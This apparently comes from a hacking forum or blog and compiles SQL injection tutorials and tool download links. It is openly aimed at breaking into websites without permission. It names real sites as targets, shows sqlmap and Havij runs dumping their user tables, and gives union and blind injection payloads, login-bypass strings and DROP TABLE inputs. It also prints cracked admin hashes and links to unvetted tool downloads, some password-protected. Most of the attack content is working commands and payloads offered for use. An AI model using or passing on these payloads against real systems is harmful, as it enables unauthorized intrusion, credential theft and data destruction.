HOW TO HACK A WEBSITE USING "SQLMAP" ON WINDOWS

In this tutorial, we will learn how to Find a vulnerable Link in a website, Exploit that link by SQL Injection and taking total control over any website,This includes access to usernames and passwords database, defacing it, address forwarding and much more.This is the most powerful attack against any website and can create a word-wide mess if done for evil purposes.

So What are we waiting for ? Lets Begin ...

Step 1 :

======

Find A Sql injectable website to hacking...

Simply put (') after the site and if u got any syntex error so the site is vulnerable...

I found a site to give u an example of the tool very clearly...

http://www.areyoureadytoorder.co.uk/review.php?id=280'

The site is vulnerable so let's hack it...

Step 2 :

======

In this tutorial i will use windows so put this command in cmd...

Start Sqlmap and type this command into it....

I made a directory in the python folder named as sqlmap so this is....

+++++++++
command 1:
+++++++++        

                    python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --dbs

here -u = means the link of your sql injectable webste....

     

       --dbs = means tell the programme that dump the database...

Step 3 : 

=====

So after Getting the Database name to dump the tables type this command on the box...

++++++++
command 2 :

++++++++

                 python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --tables -D aytro

Step 4 : 

=====

Now you wanna the columns that database have so let's go to dump the columns.....

+++++++++
command 3 :
+++++++++

                  python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --columns -D aytro -T ay_user

Step 5 : 

=====

So now you have tables and  columns of the website database....now the time to dump the username and password from the website....


Put the command to get the username and password....

+++++++++
command 4 :
+++++++++

                     python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --columns -D aytro -T ay_user --dump

SO HERE IS THE USERNAME AND PASSCODES TO ACCESS BUT THE PASS IN HASH U NEED TO CRACK THEM SO AFTER THAT U GONE A ACCESS ON THE SITE,,,



HOPE U GUYS ENJOY THE TUTORIAL...

HOW TO INSTALL SQL Map ON WINDOWS

SQl Map is an Auto. SQL injection Tool

So first

===================================

1. Download sqlmap from here .(Around 6-7 mb)

2. Download Python for windows.. click here..(15mb)

3. Now while installing python:

   install python to the "C:\python" directory (or any diterctory you 

   wish but remember the path) click next next next ok ... :)

4.Extract the files from the SQLMAP zip file...

You will see sumthing like this in the folder:

5. Now go to your directory where python is installed (For me C:\Python)

   You'll see sumthng lyk this:

6. Now as you saw in the screenshot create a folder here named "sqlmap"

7. Now goto the folder where you extracted sqlmap and copy all files\folders like in the screenshot:

8.Now paste the files and folders in the new sqlmap folder you created inside python directory lyk this:

9. After pasting goto to desktop right click >> New >> Shortcut

    And in location bar type "cmd" (without quotes) click next next ok.

 (rename it what you want)

     

 10. Now goto properties of the shortcut created on your desktop and in   the "start in:" space type C:/Python instead of %windir% and click OK.

as below:

Now you are almost done...

Open the shortcut

And to use Sqlmap jst type the foll. command (as in the pic):

  

                python sqlmap/sqlmap.py 

Hope It Helps

Sql Poizon Free Download

SQL POIZEN



=> Sql poizon tool includes php, asp, rfi, lfi dorks. You can scan site by google dorks. And fix vulnerable sites. This software allows you to scan site based on country. After scan site you can crawl sites for checking vulnerability. You also can inject by this tools. Lets see screenshot of this tool:

Gr3eNoX Exploit Scanner SQLi/XSS/LFi/RFi v1.1

Updates
=======

• XSS Scanner
• RFi Scanner Bug fixed
• Remove Duplicate algorithm changed

SQL INJECTION WITH HAVIJ + DOWNLOAD FULL VERSION'S

Note :  For the security reason the link is censored.
=======================================


Step 1 :
----------

Find a Vulnerable site Using The Google Dork.

U can Find it here : 

 http://safehacking4mas.blogspot.in/2011/05/useful-dork-list-for-sql-injection.html

Check The site is vulnerable or not Using The    '    After the id or other perameter.

If u get an error so the site is vulnerable to sql injection attack. If not than try other site.


Step 2:
---------

Download the Full Version  Which You Would Like.

=======================================

Havij

Havij 1.10

Havij  1.14

Havij 1.15

Havij 1.16

Havij 1.17

Step 3:
----------

Now Open The Havij Tool.



And Put the vulnerable Link  on the bar and Start Attacking.




Step 4:
----------

After the tool trying automated queries on the website and provide the database name.




Step 5:
----------

Go to table and click on the database name and click on the Get table.



Next Click On the Get Colums.



And You Get the all colums that u want,


In there the admin and pass or id Filed You have shown.

Just tick on it and Click on the Get Data.



After Take a time and u have the admin and password of the site.

Sometimes mostly the password in Hash B'coz of security.


Step 6:
----------

After the Login details You have got u need to Login Panel Of the site.

Go to the Find Admin Tab And search it.

It takes some time and You Have got the admin panel link of the site just go to 

the link and login and do what u want to with site.

What Is SQL injection???

SQL Injection

SQL injection is most common methodology employed by a hacker to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that exposes unauthorized data/information to a user. SQL injection occurs when the user input is incorrectly filtered for embedded SQL statements.
The technique is powerful enough not only to expose the information to the user but also modify and delete the content which could prove disastrous to the company.

SQL injection vulnerabilities have three forms:

Incorrectly filtered special characters: escape characters

This form of SQL injection occurs when the user manipulates the SQL statements using characters such as ’. For instance consider that you need to enter username and password while logging into your account. The SQL statement generated will be:
“SELECT * FROM users WHERE password = ’” + password + “‘;”

Now suppose the userName and/or password so entered are” ‘ or ‘1’=’1”. So the SQL statement reaching the back end will be:

“SELECT * FROM users WHERE password =’ ‘or ‘1’=’1 ‘;”

Look closely at this statement. It is deciphered by the database as select everything from the table “user” having field name equal to ‘ ‘ or 1=1. During authentication process, this condition will always be valid as 1 will always equal 1. Thus this way the user is given unauthorized access.

List of Some Important inputs used by hackers to use SQL Injection technique are:
a) ‘ or ‘a’=’a
b) ‘ or 1=1 –
c) ‘ or 1=1; –
d) ‘; select * from *; –
e) ‘ (Single quote)(Here we look at the error)
f) ‘; drop table users –

On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of “username” in the statement below would cause the deletion of the “users” table as well as the selection of all data from the “data” table (in essence revealing the information of every user):
a’;DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%

Incorrectly handling input data type

This form of SQL injection occurs when the user input is not strongly typed i.e. , the input by the user is not checked for data type constraint. For example consider a field where you are asked to enter your phone number. Since the phone number input is of numeric data type, therefore the input must be checked whether it is numeric or not. If not checked, then the user can send alphanumeric input and embedded SQL statements. Consider the following SQL statement:
“SELECT * FROM user WHERE telephone = “+ input +”;”
Now if I can input alphanumeric data say “11111111;DROP TABLE user” then I have embedded an SQL statement to delete the entire table “user”. This might prove detrimental to the company!!!

If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:

1. ‘ having 1=1 –
2. ‘ group by user.id having 1=1 –
3. ‘ group by users.id, users.username, users.password, users.privs having 1=1—
4. ‘ union select sum(users.username) from users—
5. ‘ union select sum(id) from users –

Vulnerabilities inside the database server

Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server’s real_escape_chars() functions.
If the database server is not properly configured then the access to the database can easily be found out by the hacker.
The hacker can get information regarding the database server using the following input:
‘ union select @@version,1,1,1—

1. Extended Stored Procedure Attacks
2. sp_who: this will show all users that are currently connected to the database.
3. xp_readmail, , , , ,@peek=’false’ : this will read all the mails and leave the message as unread.

In the same way there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in software application at the database layer

Learn How To Hack Websites , Mysql Injection Tutorial

SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.
Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

How To Find The Websites Having SQL injection Vulenerability

So You Have Always Wondered That Sql Injection is such a nice approach in hacking a website but you must have not got any website that has login form having sql injection vulnerability

So heres the trick how to find one...just make a google search - "admin login.asp" (without quotes)
..Here asp stans for ACTIVE SERVER PAGES.. asp is a Program By Microsoft That uses server side scripting languages like VBscript and Running On Ms-Sql server...and the search will result the pages for administrator login having extension .asp



After reaching any login page you have to just use the traditional sql injection methods...where user name will be either admin or administrator..(since our goal is to gain admin priviledges),and in the password field you ca use the below script..
anything' OR 'x'='x
After gaining The admin Privilidges ,Just Do Whatever You want..Delete There Records,or Change the password ..etc...Thats What Hacking Is About...

How to hack websites using Auto SQL I Helper V.2.7

Lets start.
first you need to find the potential website that you think it might be possible to hack it. Remember that some websites are simply unhackable.
After you find your website ( better to end with "article.php?id=[number]" ) example: "http://encycl.anthropology.ru/article.php?id=1"

I will explain my tut on how to hack this website.

Check if your website can be hacked by trying to go this address :
http://encycl.anthropology.ru/article.php?id='1 <------ notice the ' before the number 1.

you should get this message:

Code:

Query failedYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

This mean that this website can be hacked because you get an error.

Now open your SQL I Helper V.2.7
and write the link :
http://encycl.anthropology.ru/article.php?id=1 <---- without the '
here

and press the inject button.

Now you should wait until the tool finish searching for columns . Time may vary depending on your connection speed , your pc speed , and the number of columns in the website.
So now you should have this:



then select "Get database" and you get this:
http://i40.tinypic.com/znq9tz.jpg

Now select any element from the "database name" box and press the "Get tables" button , I will select "anthropo_encycl":


then select any element from the "table name" box and press the "Get columns" button , I will select "user":


then select any elements you want from the "columns name" box and press "Dump Now" , i will select "usr_login" and "usr_pass"



After clicking "Dump Now" , you should see this new window




Now copy the hash on a peace of paper and go to this website:
http://www.md5crack.com/

enter the hash and press the button "Crack that hash baby!" and you should get the source of the hash.
hash:21232f297a57a5a743894a0e4a801fc3
username: admin

hash:202cb962ac59075b964b07152d234b70
pass: 123

Tooks me some time discovering the tool and preparing this tutorial and.
I am sorry for the small pics but my i have a very limited connection and cannot upload big pics
I am interested to know your comments and +rep me if you like it and think it is useful.

DOWNLOAD

Collection Of Some Other SQL Injection Tools

DOWNLOAD:
*************

http://www.4shared.com/file/IjwSV55s/SQL_InjecTion___XSS_TooLz.html


http://www.4shared.com/file/dOx_SSoc/SQL_Injection_Tool_v21a.html


http://www.4shared.com/file/6UFMWEiJ/SQL_TOOL_V23.html

http://www.4shared.com/file/X5LaBa_9/sqlinjector.html

http://www.4shared.com/file/PtZtw1Jm/yoni_project.html

MySQL Dump v1

*******************************************

*******************************************

DOWNLOAD:
*************

http://www.4shared.com/file/hE105hC1/MySQL_Dump_v1.html

SQL Exploit Scanner

Sql Exploit Scanner -V3-
-----------------------------------------------------------------------------

Hi and thanks for downloading my SQL Exploit Scanner V3

First of all I have been working on few updates and few bug fixes for this tool so small apprishiation would be great

============= NEW UPDATE LIST ==================

Updated Both Search Boxes so they both work now and no more error 503
Updated Darkie Search Engine Now you can use blackie instead of just Google
Updated Return List for google
Updated Dorks Search Option so now u can type in "inurl" as dork name so it will look like this
Example.... inurl:page.php?id= instead of just page.php?id=

Tided up the code so you get less Errors
Improved Listings
Made Close Program by app available again ( you don't have to use File> Exit any more )


============= How to use custom Dorks list ====================

when you extract sql exploit scanner V3 you will see a text file named
"MHDorks.txt"
Simply replace contecst of this list with your own, do not rename the file or it will not work




====OLD UPdate List ======

Updated DropDown Box if you using one the other one becomes unusable
Updated Search Function so both Drop Down Boxes work as search and as custom List
Updated Add your own custom dorks list ( simply edit MHDorks.txt with list of your own dorks )
Updated List Return in list box now it auto removes duplicate URL's so you don't have to visit same site twice

----IMPORTENT UPDATE-----
This was what everyone was waiting for
Updated Tool made an add on for SQL Helper 2.7 Cleaned Version ( Means No virus, back door or keylogers )
you can used it with your any AVG enabled and it runs like it should I been testing it on my pc under KAV 2010
and not once my KAV come up with any virus warnings...

---- Removed Functions List ------
Removed Minimise or CLose Box from app it self now you have to click file and exit
there is a reason why I did this in order to sql helper 2.7 work next time this is the way I had to have it exit by option
I'm working on this issue and I houpe I will fix it on my next Update

------ Still Been Developed --------
Feed back given by guys over at HF Boards
Save Settings Function
Other Search Engine function like blackie a.k.a google's old engine


---- Importent Note Please do not try and Edit any files you not supose to I'm sure you will find 1 --------------
---- Please Do not remove any files or app might stop working, and sql helper infected ---------------

Many People been asking me what does this tool do here are some Q and A

Q. WHat does this tool do
A. Look in the Help Section of the Tool it will explain everything

Q. The Tool does not work for me what should I do
A. Few things this could be an issue with.. main one is net frame works you need to go and download that 2.2 server version
another issue might be missing.ocx file go on google and what ever file is telling u it'smissing download and put it in same place as my proggy
and final and most common issue is vista users ( guys remember you need to right click and run as admin ) " Poop Vista "..

DOWNLOAD:
**************

http://www.4shared.com/file/S56uDhuU/V3MoHackzSQLExplt.html

Sql Map Injection Tool

“sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.“



This is the change log:

Rewritten SQL injection detection engine (Bernardo and Miroslav).
Support to directly connect to the database without passing via a SQL injection, -d switch (Bernardo and Miroslav).
Added full support for both time-based blind SQL injection and error-based SQL injection techniques (Bernardo and Miroslav).
Implemented support for SQLite 2 and 3 (Bernardo and Miroslav).
Implemented support for Firebird (Bernardo and Miroslav).
Implemented support for Microsoft Access, Sybase and SAP MaxDB (Miroslav).
Extended old ‘–dump -C‘ functionality to be able to search for specific database(s), table(s) and column(s), –search switch (Bernardo).
Added support to tamper injection data with –tamper switch (Bernardo and Miroslav).
Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack (Miroslav).
Added support to enumerate roles on Oracle, –roles switch (Bernardo).
Added support for SOAP based web services requests (Bernardo).
Added support to fetch unicode data (Bernardo and Miroslav).
Added support to use persistent HTTP(s) connection for speed improvement, –keep-alive switch (Miroslav).
Implemented several optimization switches to speed up the exploitation of SQL injections (Bernardo and Miroslav).
Support to test and inject against HTTP Referer header (Miroslav).
Implemented HTTP(s) proxy authentication support, –proxy-cred switch (Miroslav).
Implemented feature to speedup the enumeration of table names (Miroslav).
Support for customizable HTTP(s) redirections (Bernardo).
Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, –replicate switch (Miroslav).
Support to parse and test forms on target url, –forms switch (Bernardo and Miroslav).
Added switches to brute-force tables names and columns names with a dictionary attack, –common-tables and –common-columns. Useful for instance when system table ‘information_schema‘ is not available on MySQL (Miroslav).
Basic support for REST-style URL parameters by using the asterisk (*) to mark where to test for and exploit SQL injection (Miroslav).
Added safe URL feature, –safe-url and –safe-freq (Miroslav).
Added –text-only switch to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content (Miroslav).
Implemented few other features and switches (Bernardo and Miroslav).
Over 100 bugs fixed (Bernardo and Miroslav).
Major code refactoring (Bernardo and Miroslav).
User’s manual updated (Bernardo).


DOWNLOAD:
************

http://www.4shared.com/file/sBa0d77N/sqlmap-09.html

Hack Websites With REAL Sql V0.3

Hack Websites With REAL Sql


REAL SQL was programmed by me in REALBasic.


What is does is search through Google, using Google Dorks and tries each website for an SQL Injection Vulnerability and if it is successful it will return the vulnerable link to you!


This is the main GUI of the application and in later screenshots I will show you it's features.




Here is the search function and you can see it is returning a vulnerable URL



The search is complete and there were 3 vulnerable URLs found!



This is the save button making a .txt file of all the working links


DOWNLOAD:
*************

http://www.4shared.com/file/Z6GA0IfK/REAL_Sql_-_V03_pass-Logie.html

password - Logie

SQL Injection Helper V2

DOWNLOAD:
*************
http://www.4shared.com/file/R1s1lp8P/Injection_Helper_v2_httpscript.html

Sqlninja 0.2.3 released

Sqlninja 0.2.3 released - Advanced Automated SQL Injectsqlninja 0.2.3 released - Advanced Automated SQL Injection Tool for MS-SQL
Sqlninja is a tool written in PERL to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.

Features

* Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, authentication mode)
* Bruteforce of ’sa’ password, both dictionary-based and incremental
* Privilege escalation to ’sa’ if its password has been found
* Creation of a custom xp_cmdshell if the original one has been disabled
* Upload of netcat.exe (or any other executable) using only 100% ASCII GET/POST requests, so no need for FTP connections
* TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
* Direct and reverse bindshell, both TCP and UDP
* DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames
* Evasion techniques, in order to obfuscate the injected code and confuse/bypass signature-based IPS and application firewalls

Fancy going from a SQL Injection to a full GUI access on the DB server? What about extracting password hashes on the fly? Take a few SQL Injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug script, put all this in a shaker with a Metasploit wrapper, shake well and you have the latest release of sqlninja! See it in action here.

What’s new in 0.2.3?

* A Metasploit3 wrapper, which allows the user to use SQL Injection to execute Metasploit payloads on the remote DB server
* Several other minor improvements

You can download sqlninja 0.2.3 here:

Downlaod Sql Ninja 0.2.3

Blind SQL Injection Tool

Blind injection tutorial for mysql ,i haven't written a sql tut in awhile so ill add a blind injection tutorial for mysql, the same idea will work in ms-sql with similar commands. Blind injection is a little more complicated/time consuming, but when your injection is multi-select and union isn't possible this is your next best bet. I will go over how to pull version, how to guess table and column names, and finally how to actually pull column data out of the database.Do not try to use a comment (ie: --, or /*) when doing blind injection, its not needed and may makes things worse. There are automating tools for blind injections, I like knowing how blind attacks work so i can do things by hand when needed. I personally use a combination of doing blind injections by hand and by using automating tools to pull the actual content from a column. Pulling data from mysql using blind attack is slow, even when using automating tools, but when no other option is available its still a useful method for sites you really want ;)I will be using an example url http://site.com/news.php?id=12when we visit the url we see a news article with a title of and the article content. We test the injection is subject to a blind attack by going to
CODE
news.php?id=12 and 1=1we should see the same url and contents, then try going to
CODE
news.php?id=12 and 1=2on a successful injection you will see content missing, could be as obvious as the title/article missing or as obscure as maybe the number of pages of the article disappearing. You may have to hit back and forward on your browser to look for differences. If our injection was on a string variable instead of doing news.php?id=12 and 1=1 / news.php?id=12 and 1=2 we would be doing news.php?id=12' and 1='1 / news.php?id=12' and 1='2 this is to keep the syntax error less.For our example lets say just say the title/content of the article disappears when we did 1=2 but was still there when we did 1=1. we can see our input is affecting the mysql returned data. no data is going to match 1=2 so nothing is returned, when the statement is true the content normally being returned from the rest of the sql statement gets returned. So we now string together questions in true/false methods and when the content is displayed on the page we know the question was true, and when its not its false. I will refer to 'page loading normally' as the content is being returned from the mysql database and the statement is TRUE.--Getting mysql @@VERSION--The first question i usually ask is for the version number of mysql, it helps knowing what commands are available as different mysql have different options available.
CODE
news.php?id=12 and substring(@@version,1,1)=4what i did here was get the first character of @@version and compare it to =4, if its TRUE statement we should see the news article otherwise the page will be missing content as like we did 1=2. The page is missing content so i change the 4 to a 5 and try again, this time the page loads normally with the content there so we know were dealing with Mysql5. if 4 and 5 don't work, try 3. If its mysql3 its nearly impossible to get any data out since subselects and union isn't possible making these further commands useless.--Check if we have access to mysql.user--Next i just want to test subselects, sometimes the word "select" is blacklisted.
CODE
news.php?id=12 and (select 1)=1if subselects work you should see the page load normally. Next i want to see if we are an elevated user that has access to mysql.user.
CODE
news.php?id=12 and (SELECT 1 from mysql.user limit 0,1)=1If we have access to mysql.user the query will return 1, if we dont it will error and not return anything. So if the page loads normally here we have access to mysql.user and may be useful to pull mysql hashes later on or try using load_file() and OUTFILE. Also note i used 'limit 0,1', subselects can only return 1 row of data or they will error and fail so don't forget it.--Checking for valid tables--In our example we have mysql5, but pulling data from information_schema is slow in a blind attack so might want to just try guessing a few tables. Or you may be using mysql4 and be required to guess tables/column to get any further.
CODE
news.php?id=12 and (SELECT 1 from users limit 0,1)=1I tried guessing for table users, if there is a table called users it will load normally. Just change the table to guess table names.--Checking for column names within a found table--If you got lucky and guessed some good table names we now can try guessing some columns within those tables. users table has already been found using the above method, dont skip to this step unless you found your tables already.
CODE
news.php?id=12 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1What i did here was merge '1' with the column password, then using substring cut it back down to just the first character which should be 1 if the column password exists. Change the column password to others to try to guess other column names.--Pulling data from found table/columns--Ok this is the actual part of pulling data from those tables and this is were it becomes time consuming, I use automating tools on this part but knowing how to do it by hand makes you a better sql'er =) I'm going to pull username,password column from the table users. I already found username,password,email,userid to be valid columns within the table using the above method.
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100ok what i did here was first pull the username/password i want using a where clause, otherwise you could do limit 0,1 to pull the first user out, subselects are limited to 1 row if your subselect will return more then 1 row it will error and this will fail. So its not a bad idea to stick limit 0,1 at the end if your not sure how many rows are going to be returned. then outside of my subselect i have substring(,1,1) this trims my subselect down to just the first character, 1 character in length. Then the ascii() converts that 1 character to an ascii numeric value where i compare it using the greater then symbol > 100.So in the above example, if the ascii char was greater then 100 the page will load normally. In our case the page doesn't load with the content so we know the first char is less then 100, we guess again.
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>80page loads normally with >80, true. We go higher.
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>90false, lower
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>85true, higher
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>86false. We now narrowed it down to be greater then 85 but not greater then 86. So we know our number is 86! You can test by doing =86 if you want to be sure, it may be confusing at first. Using an ascii converter we knows char(86) is 'V', so the first letter of our returned row is 'V', exciting lol. To get the next character we modify the substring.
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>100I changed the substring ,1,1 to a ,2,1. now it returns the 2nd character of the subselect, 1 character in length. we do the same thing again as the first char. This time >100 returned true so we raise the number.
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>120false, lower the 120
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>110false, lower
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>105false,lower
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>103true, higher
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>104true, we see that its greater then 104 and NOT greater then 105 making the number we want 105. char(105) is 'i'. So we have 'Vi' so far. As you can see we did 11 requests and only got 2 characters from the database, i actually guessed the number pretty fast it may take a lot more to narrow it down. See how pulling user/password hash can be time consuming. Keep incrementing the substring until you get to the end where >0 will return false.--Automating the pulling of data--I use sqlmap .4, .5 has a few bugs and doesnt always work correctly for me. There are other tools made for blind injection as well. To pull the same username and password in sqlmap you use this command.
CODE
./sqlmap.py -u "http://site.com/news.php?id=12" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(username,0x3a,password) from users where userid=2)"-u is the url your going to inject, -p is the peramiter that is injectable, id. -a will pull a random user-agent from a text otherwise itll use the default sqlmap user-agent, not a good idea. -v1 is verbose. --string is the unique string that appears when the command is TRUE, you find this by doing 1=1 and 1=2 and pasting a small bit of text that only shows when its TRUE. -e is the command you want to evaluate, we want to do a subselect so be sure to add ( ) around your SELECT statement.Doing the above sqlmap command may take 5mins or so to finesh, but beats 30mins or so it would take to do by hand. sqlmap can also get tables/columns if your accessing mysql5, but do you really need the complete table structer. Use -e to do your own commands to only get tables/columns of interest.
CODE
./sqlmap.py -u "http://site.com/news.php?id=12" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(table_schema,0x3a,table_name,0x3a,column_name) from information_schema.columns where column_name like 0x257061737325 limit 0,1)"sqlmap doesn't like handing quotes even if your injection has magicquotes off, so hex. 0x257061737325 is '%pass%' hexed. Now we just run this and increment our limit to get next rows. much faster then using sqlmap to get ALL tables and then trying to figure what tables have what we may be looking for.


Download:
**********

http://www.4shared.com/file/0gNlsZHR/bsqlbf-v2-6-source.html


http://www.4shared.com/file/zDBtySd9/bsqlbf-v21.html

http://www.4shared.com/file/anczfkvy/BSQLHackerSetup-0909.html

ExploitMyUnion Automate Sql Injection

ExploitMyUnion is a tool written in Python with a PyQt user interface made to automate sql injection exploitation.


Features:
Injection via GET/POST/COOKIE.
Quoted injections support.
HTTP proxy support.
SQL 'load_file()' function support.
SQL 'INTO OUTFILE' statement support.
Ability to save/restore injection parameters.
Can dump a table in sql format.


DOWNLOAD:
***************

http://www.4shared.com/file/WNwuV4Zc/exploitmyunion-21_win32.html